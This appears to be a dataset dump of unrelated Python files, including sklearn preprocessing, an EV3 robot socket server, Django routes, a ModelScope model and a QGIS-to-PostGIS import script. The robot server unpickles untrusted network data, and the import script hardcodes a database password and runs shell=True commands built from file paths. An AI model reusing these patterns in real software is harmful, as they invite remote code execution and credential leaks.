text stringlengths 38 1.54M |
|---|
# Data Preprocessing Template
# Importing the libraries
# Contains mathematical tools
import numpy as np
# Helps us plot nice chart
import matplotlib.pyplot as plt
# Best library for importing and managing data sets
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Data.csv')
# Matrix of features
X = dataset.iloc[:, :-1].values
# Dependent variable vector
y = dataset.iloc[:, 3].values
# Taking care of missing data
# Imputer class will allow us to take care of the missing data
from sklearn.preprocessing import Imputer
# Mean is the default value for strategy
# Mean of the column -> mean of the features
imputer = Imputer(missing_values = 'NaN', strategy = 'mean', axis = 0)
# Not 2, 3 -> Upper bound is excluded
imputer = imputer.fit(X[:, 1:3])
# Transform replaces the missing data with the mean
X[:, 1:3] = imputer.transform(X[:, 1:3])
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X = LabelEncoder()
X[:, 0] = labelencoder_X.fit_transform(X[:, 0])
# Specify which column we want to onehotencode
onehotencoder = OneHotEncoder(categorical_features = [0])
X = onehotencoder.fit_transform(X).toarray()
# To Encode the Purchased, we don't need hotencoder since we knows
# it's the dependent variable
labelencoder_y = LabelEncoder()
y = labelencoder_y.fit_transform(y)
# Splitting the dataset into the Training Set and Test Set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
|
# Config file for tests/measure.py; previously tests/MeasureSources.paf.
# 'root' should be an instance of lsst.meas.algorithms.SourceMeasurementConfig (defined in measurement.py)
root.slots.centroid = "centroid.naive"
root.slots.apFlux = "flux.naive"
root.slots.modelFlux = "flux.gaussian"
root.slots.psfFlux = "flux.psf"
root.slots.shape = "shape.sdss"
root.algorithms["flux.naive"].radius = 3.0
root.algorithms["flux.gaussian"].shiftmax = 10.0
root.algorithms["flux.sinc"].radius = 3.0
root.algorithms.names = ["flags.pixel",
"centroid.gaussian", "centroid.naive",
"shape.sdss",
"flux.naive", "flux.gaussian", "flux.psf", "flux.sinc",
"classification.extendedness"]
root.centroider.name = "centroid.sdss"
|
import numpy as np
# 造伪样本
X = np.linspace(0, 100, 100)
X = np.c_[X, np.ones(100)]
w = np.asarray([3, 2])
Y = X.dot(w)
X = X.astype('float')
Y = Y.astype('float')
X[:, 0] += np.random.normal(size=(X[:, 0].shape)) * 3 # 添加噪声
Y = Y.reshape(100, 1)
from ml_models.linear_model import LinearRegression
import matplotlib.pyplot as plt
# 测试
lr = LinearRegression(solver='sgd')
lr.fit(X[:, :-1], Y)
predict = lr.predict(X[:, :-1])
# 查看w
print('w', lr.get_params())
# 查看标准差
print(np.std(Y - predict))
lr.plot_fit_boundary(X[:, :-1], Y)
plt.show()
|
#!/usr/bin/env python3
from ev3dev.ev3 import *
from time import sleep
from random import choice
import pickle
import socket as socket_library
HOST = ""
PORT = 9999
LEGO_SLOPE = 3.6
QUEUE_CONTROL = 0
MANUAL_CONTROL = 1
A_STAR = 2
CELEBRATE = 3
OFF = 0
ON = 1
LEFT_MOTOR = 0
RIGHT_MOTOR = 1
# Messages sent to the server for handling
ACCEPT_MSG = pickle.dumps("Directions accepted.", protocol = 0)
DECLINE_MSG = pickle.dumps("Directions invalid", protocol = 0)
SUCCESS_MSG = pickle.dumps("Directions completed.", protocol = 0)
FAILURE_MSG = pickle.dumps("Direction completion failed.", protocol = 0)
# Constants for colors that should be recognized by the program
UNKNOWN = 0
BLACK = 1
YELLOW = 4
WHITE = 6
COLORS = [UNKNOWN, BLACK, YELLOW, WHITE]
# How many sensor readings should be stored to check for errors
COLOR_MEMORY_LENGTH = 10
MIN_DISTANCE = 50
# Percentages used to control how the robot reacts to changes in color
# calculated by dividing amount of a color by the color memory length
# Road threshold determines how many times the robot can detect a color besides black, white, and yellow before shutting off
# The feature is currently unused (the threshold is set at greater than 100%)
ROAD_THRESHOLD = 1.1
# Node threshold determines how many times the robot needs to see yellow before reacting to the node
NODE_THRESHOLD = 0.3
# Constants used to store turning directions
# Switch to numbers? Used to cause issues, need to check if still issue
LEFT = "left"
RIGHT = "right"
STRAIGHT = "straight"
REVERSE = "reverse"
# Integer value between 0 and 1000 that limits the speed of the motors.
MAX_SPEED = 360
# Float value that is used to keep track of how far off track the robot is when exiting a node.
error = 0
# Float value that determines how severely the robot reacts to being in the wrong location while following the road.
adjustment = 0.1
# Float value that is muliplied by the robot's max speed to slow down the robot during turns to increase accuracy.
turn_speed_reduction = 0.2
# Boolean value (1 or -1) that decides whether the robot should expect black to be on the left or right side of the robot's center.
# 1 is equivalent to black on the left, -1 is equivalent to black on the right
black_side = 1
# Counter used to keep track of how long the robot has been waiting on an obstacle to move
obstacle_detected_counter = 0
# How many times the robot will wait for an obstacle to move
obstacle_wait_timeout = 2
# A list of empty strings which is later used to keep track of past color sensor readings which are used for error tracking
past_colors = []
for i in range(COLOR_MEMORY_LENGTH):
past_colors.append("")
# Used as a killswitch while the robot is running
btn = Button()
# Initializes color sensor and ensures it is connected.
cl = ColorSensor()
assert cl.connected, "Connect color sensor."
# Initializes infrared sensor and ensures it is connected.
ir = InfraredSensor()
assert ir.connected, "Connect IR sensor."
# Initializes touch sensor and ensures it is connected.
ts = TouchSensor()
assert ts.connected, "Connect touch sensor."
# Initializes left and right motors and ensures they are connected.
l_motor = LargeMotor(OUTPUT_B)
assert l_motor.connected, "Connect left motor to port B."
r_motor = LargeMotor(OUTPUT_C)
assert r_motor.connected, "Connect right motor to port C."
# Sets color sensor to return an integer value representative of the color its seeing.
cl.mode = "COL-COLOR"
# Sets infrared sensor to measure proximity on a scale of 0% - 100%.
# 0% is equivalent to 0 cm and 100% is approximately 70 cm.
ir.mode = "IR-PROX"
# Creates a socket object used to connect to the server
socket = socket_library.socket(socket_library.AF_INET, socket_library.SOCK_STREAM)
# Runs the motors until stopped while also allowing easy adjustment of speed.
def run_motors():
l_motor.run_forever()
r_motor.run_forever()
# Forces both motors to stop immediately.
def stop_motors():
l_motor.speed_sp = 0
r_motor.speed_sp = 0
l_motor.stop(stop_action = "hold")
r_motor.stop(stop_action = "hold")
# Updates list of past colors and calculates how frequent a color is seen which is used to determine the robot's location
def detect_color():
global COLORS
global past_colors
current_color = cl.value()
for i in range(len(past_colors) - 1):
past_colors[i] = past_colors[i + 1]
past_colors[len(past_colors) - 1] = current_color
percent_unknown = past_colors.count(UNKNOWN) / len(past_colors)
percent_black = past_colors.count(BLACK) / len(past_colors)
percent_yellow = past_colors.count(YELLOW) / len(past_colors)
percent_white = past_colors.count(WHITE) / len(past_colors)
return(percent_unknown, percent_black, percent_yellow, percent_white)
# Changes the speed of the motors to make the robot follow a line.
# Uses LEGO's predefined color ranges
def follow_road():
global error
global black_side
current_color = cl.value()
if current_color == BLACK:
error -= adjustment
elif current_color == WHITE:
error += adjustment
if error > 0.15:
error = 0.15
elif error < -0.15:
error = -0.15
left_motor_speed = (-1 * MAX_SPEED * error * black_side) + MAX_SPEED
right_motor_speed = (MAX_SPEED * error * black_side) + MAX_SPEED
if left_motor_speed > MAX_SPEED:
left_motor_speed = MAX_SPEED
elif left_motor_speed < -MAX_SPEED:
left_motor_speed = -MAX_SPEED
if right_motor_speed > MAX_SPEED:
right_motor_speed = MAX_SPEED
elif right_motor_speed < -MAX_SPEED:
right_motor_speed = -MAX_SPEED
l_motor.speed_sp = left_motor_speed
r_motor.speed_sp = right_motor_speed
run_motors()
#
def check_for_obstacles():
global obstacle_detected_counter
if ir.value() < MIN_DISTANCE:
stop_motors()
obstacle_detected_counter += 1
Sound.speak("Please move the obstacle out of my driving path. Thank you.").wait()
sleep(10)
# collision check
elif ts.value():
stop_motors()
obstacle_detected_counter += 1
Sound.speak("Please move the obstacle out of my driving path. Thank you.").wait()
sleep(10)
else:
obstacle_detected_counter = 0
# Ensures the robot turns and exits a node in the correct order
def handle_node(turn_direction):
global past_colors
global black_side
stop_motors()
# Turn if the robot isn't going straight
if turn_direction != STRAIGHT:
turn(turn_direction)
# Change which side the robot should expect to see black on if its going straight or turning completely around
if turn_direction == STRAIGHT or turn_direction == REVERSE:
black_side *= -1
# Leave the node
exit_node()
# Reset the color memory
past_colors = []
for i in range(COLOR_MEMORY_LENGTH):
past_colors.append("")
# Called when the robot is prevented from reaching its destination
def handle_failure():
stop_motors()
socket_connection.sendall(FAILURE_MSG)
socket_connection.shutdown(socket_library.SHUT_RDWR)
socket_connection.close()
sleep(3)
exit()
# No longer used; returns random direction from a list of possible directions
def get_directions():
global black_side
turn_direction = choice(DIRECTIONS)
if turn_direction == STRAIGHT:
black_side *= -1
return(turn_direction)
# Ensures the robot can turn in any direction and end up where expected
def turn(turn_direction):
global black_side
# becomes true when a specific waypoint during the turn has been detected
half_turn_complete = False
# becomes true when the turn has been completed
turn_complete = False
# updates the reading from the color sensor
current_color = cl.value()
while not turn_complete:
global obstacle_detected_counter
check_for_obstacles()
if obstacle_detected_counter > obstacle_wait_timeout:
handle_failure()
elif obstacle_detected_counter == 0:
# if black is on the left
if black_side == 1:
if turn_direction == LEFT:
if current_color != BLACK:
r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
elif turn_direction == RIGHT:
if half_turn_complete != True:
if current_color != BLACK:
l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
half_turn_complete = True
elif current_color != WHITE:
l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
elif turn_direction == REVERSE:
if half_turn_complete != True:
if current_color != BLACK:
l_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
half_turn_complete = True
elif current_color != WHITE:
l_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
# if black is on the right
elif black_side == -1:
if turn_direction == LEFT:
if half_turn_complete != True:
if current_color != BLACK:
r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
half_turn_complete = True
elif current_color != WHITE:
r_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
elif turn_direction == RIGHT:
if current_color != BLACK:
l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
elif turn_direction == REVERSE:
if half_turn_complete != True:
if current_color != BLACK:
l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
r_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
else:
half_turn_complete = True
elif current_color != WHITE:
l_motor.speed_sp = MAX_SPEED * turn_speed_reduction
r_motor.speed_sp = -MAX_SPEED * turn_speed_reduction
else:
turn_complete = True
# runs the motors at the new speeds
run_motors()
# updates the reading from the color sensor
current_color = cl.value()
stop_motors()
# Ensures the robot stays on the road when leaving a node
# This implementation will only work on black and white roads as it aims for a reflection value which occurs at the intersection of black and white
def exit_node():
target_reflection = 35
cl.mode = "COL-REFLECT"
for i in range(300):
error = (target_reflection - cl.value())
l_speed = (LEGO_SLOPE * error * black_side) + MAX_SPEED
r_speed = (-LEGO_SLOPE * error * black_side) + MAX_SPEED
if l_speed > MAX_SPEED:
l_speed = MAX_SPEED
if r_speed > MAX_SPEED:
r_speed = MAX_SPEED
l_motor.speed_sp = l_speed
r_motor.speed_sp = r_speed
run_motors()
stop_motors()
cl.mode = "COL-COLOR"
socket.setsockopt(socket_library.SOL_SOCKET, socket_library.SO_REUSEADDR, 1)
socket.bind((HOST, PORT))
socket.listen(1)
socket_connection, client_ip = socket.accept()
print("Connected to ", client_ip)
while True:
ser_direction_queue = socket_connection.recv(1024)
# Error checking needs to happen between here...
direction_queue = pickle.loads(ser_direction_queue)
direction_queue_length = len(direction_queue) - 1
# ...and here
socket_connection.sendall(ACCEPT_MSG)
mode = direction_queue[direction_queue_length]
if mode == QUEUE_CONTROL:
# killswitch
if btn.any():
exit()
else:
for i in range(direction_queue_length):
turn_direction = direction_queue[i]
while True:
color_percents = detect_color()
if (color_percents[0] < ROAD_THRESHOLD) and (color_percents[2] < NODE_THRESHOLD):
follow_road()
elif color_percents[2] >= NODE_THRESHOLD:
handle_node(turn_direction)
break
else:
handle_failure()
break
elif mode == MANUAL_CONTROL:
# killswitch
if btn.any():
exit()
else:
l_motor.speed_sp = MAX_SPEED
r_motor.speed_sp = MAX_SPEED
if direction_queue[LEFT_MOTOR] == ON:
l_motor.run_timed(time_sp = 100)
else:
l_motor.stop(stop_action = "hold")
if direction_queue[RIGHT_MOTOR] == ON:
r_motor.run_timed(time_sp = 100)
else:
r_motor.stop(stop_action = "hold")
elif mode == A_STAR:
for i in range(direction_queue_length + 1):
if i < direction_queue_length:
turn_direction = direction_queue[i]
while True:
check_for_obstacles()
# killswitch
if btn.any():
handle_failure()
# has the robot already waited on an obstacle to move?
elif obstacle_detected_counter > obstacle_wait_timeout:
Sound.speak("Obstacle has not moved. Exiting.")
handle_failure()
# normal operations
elif obstacle_detected_counter == 0:
color_percents = detect_color()
if (color_percents[0] < ROAD_THRESHOLD) and (color_percents[2] < NODE_THRESHOLD):
follow_road()
elif color_percents[2] >= NODE_THRESHOLD:
if i < direction_queue_length:
handle_node(turn_direction)
stop_motors()
break
else:
stop_motors()
break
else:
handle_failure()
socket_connection.sendall(SUCCESS_MSG)
elif mode == CELEBRATE:
Sound.speak("Arrived at destination.").wait()
sleep(5)
Sound.speak("Returning home.").wait()
socket_connection.sendall(SUCCESS_MSG)
else:
print("INVALID MODE")
print("Exiting program")
break
# Stops the robot and notifies the user with a beep.
stop_motors()
Sound.beep()
# Python default function which ensures the program ends correctly
exit()
|
from django.conf.urls.defaults import patterns, include
urlpatterns = patterns('django.contrib.auth.views',
(r'^accounts/login/$', 'login', {'template_name': 'ui/login.html'}),
(r'^accounts/logout/$', 'logout', {'template_name': 'ui/logout.html'}),
)
urlpatterns += patterns('geppetto.ui.views.general',
('^$', 'root', {}, 'root'),
('^unassigned_workers_list$', 'unassigned_workers_list', {},
'unassigned_workers_list'),
(r'^', include('geppetto.ui.views.install.urls')),
(r'^', include('geppetto.ui.views.config.urls')),
(r'^', include('geppetto.ui.views.upgrade.urls')),
(r'^(?P<page_name>[a-z_]+)$', 'common', {}, 'common')
)
|
# -*- coding: utf-8 -*-
"""
Created on Wed Nov 8 17:33:23 2017
@author: jagan
"""
#*arg(Simple Argument) & **kwarg(Keyword Argument)
#* - Non Keyword variables ; args is idiom and not enforced
def normal_function(var1,var2):
print("var1:",var1)
print("var2:",var2)
def normal_funtion_one_var(var1,*arg):
print("var1:",var1)
for item in arg:
print("Rest of the data:",item)
def normal_funtion_two_var(var1,var2,*arg):
print("var1:",var1)
print("var2:",var2)
for item in arg:
print("Rest of the data:",item)
def normal_funtion_arg_only(*arg):
for item in arg:
print("Rest of the data:",item)
#normal_function('hello','python')
#normal_funtion_one_var('hello','python','jagan','iot','mobile','ML')
#normal_funtion_two_var('hello','python','jagan','iot','mobile','ML')
normal_funtion_arg_only('hello','python','jagan','iot','mobile','ML') |
# Part of the implementation is borrowed and modified from BMT and video_features,
# publicly available at https://github.com/v-iashin/BMT
# and https://github.com/v-iashin/video_features
import argparse
import os
import os.path as osp
from copy import deepcopy
from typing import Dict, Union
import numpy as np
import torch
import torch.nn as nn
from bmt_clipit.sample.single_video_prediction import (caption_proposals,
generate_proposals,
load_cap_model,
load_prop_model)
from bmt_clipit.utilities.proposal_utils import non_max_suppresion
from torch.nn.parallel import DataParallel, DistributedDataParallel
from videofeatures_clipit.models.i3d.extract_i3d import ExtractI3D
from videofeatures_clipit.models.vggish.extract_vggish import ExtractVGGish
from videofeatures_clipit.utils.utils import (fix_tensorflow_gpu_allocation,
form_list_from_user_input)
from modelscope.metainfo import Models
from modelscope.models.base import Tensor, TorchModel
from modelscope.models.builder import MODELS
from modelscope.models.cv.language_guided_video_summarization.transformer import \
Transformer
from modelscope.utils.constant import ModelFile, Tasks
from modelscope.utils.logger import get_logger
logger = get_logger()
def extract_text(args):
# Loading models and other essential stuff
cap_cfg, cap_model, train_dataset = load_cap_model(
args.pretrained_cap_model_path, args.device_id)
prop_cfg, prop_model = load_prop_model(args.device_id,
args.prop_generator_model_path,
args.pretrained_cap_model_path,
args.max_prop_per_vid)
# Proposal
proposals = generate_proposals(prop_model, args.features,
train_dataset.pad_idx, prop_cfg,
args.device_id, args.duration_in_secs)
# NMS if specified
if args.nms_tiou_thresh is not None:
proposals = non_max_suppresion(proposals.squeeze(),
args.nms_tiou_thresh)
proposals = proposals.unsqueeze(0)
# Captions for each proposal
captions = caption_proposals(cap_model, args.features, train_dataset,
cap_cfg, args.device_id, proposals,
args.duration_in_secs)
return captions
def extract_video_features(video_path, tmp_path, feature_type, i3d_flow_path,
i3d_rgb_path, kinetics_class_labels, pwc_path,
vggish_model_path, vggish_pca_path, extraction_fps,
device):
default_args = dict(
device=device,
extraction_fps=extraction_fps,
feature_type=feature_type,
file_with_video_paths=None,
i3d_flow_path=i3d_flow_path,
i3d_rgb_path=i3d_rgb_path,
keep_frames=False,
kinetics_class_labels=kinetics_class_labels,
min_side_size=256,
pwc_path=pwc_path,
show_kinetics_pred=False,
stack_size=64,
step_size=64,
tmp_path=tmp_path,
vggish_model_path=vggish_model_path,
vggish_pca_path=vggish_pca_path,
)
args = argparse.Namespace(**default_args)
if args.feature_type == 'i3d':
extractor = ExtractI3D(args)
elif args.feature_type == 'vggish':
extractor = ExtractVGGish(args)
feats = extractor(video_path)
return feats
def video_features_to_txt(duration_in_secs, pretrained_cap_model_path,
prop_generator_model_path, features, device_id):
default_args = dict(
device_id=device_id,
duration_in_secs=duration_in_secs,
features=features,
pretrained_cap_model_path=pretrained_cap_model_path,
prop_generator_model_path=prop_generator_model_path,
max_prop_per_vid=100,
nms_tiou_thresh=0.4,
)
args = argparse.Namespace(**default_args)
txt = extract_text(args)
return txt
@MODELS.register_module(
Tasks.language_guided_video_summarization,
module_name=Models.language_guided_video_summarization)
class ClipItVideoSummarization(TorchModel):
def __init__(self, model_dir: str, *args, **kwargs):
"""initialize the video summarization model from the `model_dir` path.
Args:
model_dir (str): the model path.
"""
super().__init__(model_dir, *args, **kwargs)
model_path = osp.join(model_dir, ModelFile.TORCH_MODEL_FILE)
self.loss = nn.MSELoss()
self.model = Transformer()
if torch.cuda.is_available():
self._device = torch.device('cuda')
else:
self._device = torch.device('cpu')
self.model = self.model.to(self._device)
self.model = self.load_pretrained(self.model, model_path)
if self.training:
self.model.train()
else:
self.model.eval()
def load_pretrained(self, net, load_path, strict=True, param_key='params'):
if isinstance(net, (DataParallel, DistributedDataParallel)):
net = net.module
load_net = torch.load(
load_path, map_location=lambda storage, loc: storage)
if param_key is not None:
if param_key not in load_net and 'params' in load_net:
param_key = 'params'
logger.info(
f'Loading: {param_key} does not exist, use params.')
if param_key in load_net:
load_net = load_net[param_key]
logger.info(
f'Loading {net.__class__.__name__} model from {load_path}, with param key: [{param_key}].'
)
# remove unnecessary 'module.'
for k, v in deepcopy(load_net).items():
if k.startswith('module.'):
load_net[k[7:]] = v
load_net.pop(k)
net.load_state_dict(load_net, strict=strict)
logger.info('load model done.')
return net
def _train_forward(self, input: Dict[str, Tensor]) -> Dict[str, Tensor]:
frame_features = input['frame_features']
txt_features = input['txt_features']
gtscore = input['gtscore']
preds, attn_weights = self.model(frame_features, txt_features,
frame_features)
return {'loss': self.loss(preds, gtscore)}
def _inference_forward(self, input: Dict[str,
Tensor]) -> Dict[str, Tensor]:
frame_features = input['frame_features']
txt_features = input['txt_features']
y, dec_output = self.model(frame_features, txt_features,
frame_features)
return {'scores': y}
def forward(self, input: Dict[str,
Tensor]) -> Dict[str, Union[list, Tensor]]:
"""return the result by the model
Args:
input (Dict[str, Tensor]): the preprocessed data
Returns:
Dict[str, Union[list, Tensor]]: results
"""
for key, value in input.items():
input[key] = input[key].to(self._device)
if self.training:
return self._train_forward(input)
else:
return self._inference_forward(input)
|
#/user/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from qgis.core import *
import subprocess # pour utiliser subprocess.call()
import time
from PyQt4.Qt import *
def CreateFile(self):
"""creer un fichier"""
# open(self, 'parametre') permet en fonction du parametre de creer un fichier
create = open(self, "w")
create.close()
def WriteFile(self,texte):
"""ecrire dans un fichier"""
# open(self, 'parametre') permet en fonction du parametre d'ecrire dans un fichier
writing = open(self, 'a')
#la variable texte permet d'indiquer la valeur a ecrire. de plus on ajoute un retour a la ligne
writing.write(texte+'\n')
writing.close()
"""##########################"""
""" variables a modifier """
""" Config Postgis """
url='localhost'
db='mug'
port = 5432
login='postgres'
mdp='amaury'
repertoire=r"D:\00_Corbeille\keolis"
shem='bati'
""" variables a modifier si utilise sur windows
Chemin d'acces a postgis et qgis """
pathpg = r"C:\Program Files\PostgreSQL\9.4\bin"
pathAppsQgis = r"C:\Program Files\QGIS Lyon\apps\qgis"
"""##########################"""
# indication du repertoire contenant l'installation de qgis
if sys.platform == 'win32':
QgsApplication.setPrefixPath(pathAppsQgis, True)
elif sys.platform == 'linux2':
app = QApplication(sys.argv)
QgsApplication.setPrefixPath('/usr', True)
""" Initialisation de QGIS """
#RAS faut l'initialiser pour que le script soit autonome, mais o peux le virer sans probleme a priori
QgsApplication.initQgis()
""" creation du fichier texte """
# recup dans une variable du jour_mois_annee
date = time.strftime("%d_%m_%Y", time.localtime())
# on ecrit dans le repertoire ou se trouve les donnees source un fichier txt qui va resumer les caracteristiques des fichiers
FichierTxt='%s/resume_%s.txt' % (repertoire,date)
CreateFile(FichierTxt)
# on affecte aux variable d'environnement les valeurs suivantes
os.environ['PGHOST'] = url
os.environ['PGPORT'] = str(port)
os.environ['PGUSER'] = login
os.environ['PGPASSWORD'] = mdp
os.environ['PGDATABASE'] = db
#on recupere dans une variable le repertoire defini plus haut ! inutile en effet :p
base_dir = repertoire
# os.walk permet de, comme son nom l'indique de naviguer dans un repertoire donne en l'occurence dans celui defini plus haut
full_dir = os.walk(base_dir)
# creation d'une liste qui va contenir tout les chemins d'acces aux donnees
shapefile_list = []
# on decoupe en trois variables le resultat de l'os.walk dans une boucle
#file_ permet de recuperer le nom de chaque fichier
for source, dirs, files in full_dir:
for file_ in files:
# on cherche ici a recupere les fichiers avec l'extension shp. [-3:] permet de recup uniquement les trois derniers caracteres du nom de fichiers
if file_[-3:] == 'shp':
# on recree le chemin de la donnees complet (repertoire + fichier)
shapefile_path = os.path.join(base_dir, file_)
# ajout dans la liste precedemment creee
shapefile_list.append(shapefile_path)
# das la liste nouvellement creee
for shape_path in shapefile_list:
#dans le cas d'un systeme windows, on va lire l'encodage du shp avec pyqgis
if sys.platform == 'win32':
# on initialise le layer a partir de son chemin d'acces ; tmp correspon au nom de la couche (peux etre vide), ogr est le driver
vct = QgsVectorLayer(shape_path, "tmp", "ogr" )
# on appelle le provider pour appeler la valeur d'encoage ensuite
provider = vct.dataProvider()
encoding = provider.encoding()
# dans le cas d'un systeme unix o va lire le fichier cpg contenat l'infos de l'encodage. pyqgis ne fonctionne pas super bien sur linux.. :(
elif sys.platform == 'linux2':
# on recup dans une variable le nom des fichiers cpg. nous avons deja les shp, il suffit donc de modifier lextension dans une variable
cpgFile = r'%scpg' % shape_path[:-3]
#try = litterallement on essaie ici d'ouvrir le fichier cpg (open()) et de lire ce qu'il y a dedans
try:
with open(cpgFile) as f:
# f.readlines permet de lire le fichier et de creer une liste = une entree pour chaque ligne
encoding = f.readlines()
#la premiere ligne nous interesse donc on indique la valeur 0
encoding = encoding[0]
# si pb on obtient une IOError, du coup on affecte a la varialbe encoing la valeur None
except IOError:
encoding = None
# si l'encodage est bien de l'utf8 alors....
if encoding == 'UTF-8' or encoding == 'utf-8':
provider_name = "ogr"
# recuperation des infos du fichier shp
fileInfo = QFileInfo(shape_path)
# iitialisation du fichier (appel a partir du repertoire + nom du fichier, provider(ogr))
layer = QgsVectorLayer(shape_path, fileInfo.fileName(), provider_name)
# layer.crs().authid() permet de recuperer les infos sur la projection
# .split(":") permet de transformer la variable en liste afin de recuperer la valeur de l'epsg (1)
exp_crs=str(layer.crs().authid().split(':')[1])
#variable qui servira a dire que l'importation a tete valide dans le futur fichier txt
imp='oui'
if sys.platform == 'win32':
#a partir du chemin d'acces a la donnees, on recupere le nom du fichier
namefile=shape_path.split('\\')[len(shape_path.split('\\'))-1].split('.')[0]
#on indique le nom du repertoire ou se trouve postgis
os.environ['PATH'] = pathpg
#on cree une variable avec la commane qui va bien pour utiliser shp2pgsql ; les valers de | psql ont deja ete preciser dans les variables d'envrionement
cmds = 'shp2pgsql.exe -I -s %s: "%s" %s.%s | psql ' % (exp_crs, shape_path, shem, namefile)
#permet de lancer la commande
subprocess.call(cmds, shell=True)
elif sys.platform == 'linux2':
#meme principe
namefile=shape_path.split('/')[len(shape_path.split('/'))-1].split('.')[0]
cmds = 'shp2pgsql -I -s %s: "%s" %s.%s | psql ' % (exp_crs, shape_path, shem, namefile)
subprocess.call(cmds, shell=True)
# si l'encodage n'est pas de l'UTF8
elif encoding is None or encoding != 'UTF-8':
print 'Fichier %s n''est pas en UTF-8' %shape_path
imp='NON- VERIFIER ENCODAGE (UTF-8 OBLIGATOIRE - .cpg probablement ABSENT)'
#apres la fin de la boucle on ecrit le repertoire de la couche puis la valeur imp = oui ou non
WriteFile(FichierTxt,"{0},{1}" .format(shape_path,imp))
#ouverture du txt selon le systeme d'exploitation
if sys.platform == 'win32':
os.popen("%s" %FichierTxt)
elif sys.platform == 'linux2':
os.system('gnome-open %s' %FichierTxt) |
# Generated by Django 3.1.3 on 2020-12-12 16:23
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='About',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('description', models.TextField()),
('logo', models.ImageField(upload_to='upload')),
],
),
migrations.CreateModel(
name='Certificate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('logo', models.ImageField(upload_to='upload')),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('phone', models.CharField(max_length=300)),
('address', models.CharField(max_length=300)),
('email', models.EmailField(max_length=300)),
('facebook', models.CharField(blank=True, max_length=300)),
('google', models.CharField(blank=True, max_length=300)),
('twitter', models.CharField(blank=True, max_length=300)),
('skype', models.CharField(blank=True, max_length=300)),
],
),
migrations.CreateModel(
name='Doctor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('logo', models.ImageField(upload_to='upload')),
('last_name', models.CharField(max_length=300)),
('first_name', models.CharField(max_length=300)),
('position', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='Faq',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('icon', models.CharField(max_length=300)),
('title', models.CharField(max_length=300)),
('description', models.CharField(max_length=300)),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Glavniy',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mini1_description', models.CharField(blank=True, max_length=300)),
('title', models.CharField(max_length=300)),
('mini2_description', models.CharField(blank=True, max_length=300)),
('mini3_description', models.CharField(blank=True, max_length=300)),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Information',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('short_description', models.CharField(blank=True, max_length=300)),
('description', models.TextField()),
('short_description1', models.CharField(blank=True, max_length=300)),
('short_description2', models.CharField(blank=True, max_length=300)),
('short_description3', models.CharField(blank=True, max_length=300)),
('short_description4', models.CharField(blank=True, max_length=300)),
],
),
migrations.CreateModel(
name='Latest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('mini_description', models.CharField(max_length=300)),
('logo', models.ImageField(upload_to='upload')),
('data', models.DateField()),
('comment', models.IntegerField(default=0)),
('title', models.CharField(max_length=300)),
('name', models.CharField(max_length=300)),
('description', models.CharField(max_length=300)),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Opening',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('description', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='Partner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('logo', models.ImageField(upload_to='upload')),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Prize',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('mini_description', models.CharField(max_length=300)),
('status', models.IntegerField(default=0)),
('short_description', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='Register',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=300)),
('phone', models.CharField(max_length=300)),
('email', models.EmailField(blank=True, max_length=300)),
('data', models.DateField()),
('time', models.TimeField()),
('description', models.CharField(max_length=300)),
],
),
migrations.CreateModel(
name='Staff',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=300)),
('description', models.CharField(max_length=300)),
('logo', models.ImageField(upload_to='upload')),
('last_name', models.CharField(max_length=300)),
('first_name', models.CharField(max_length=300)),
('position', models.CharField(max_length=300)),
('rating', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Success',
fields=[
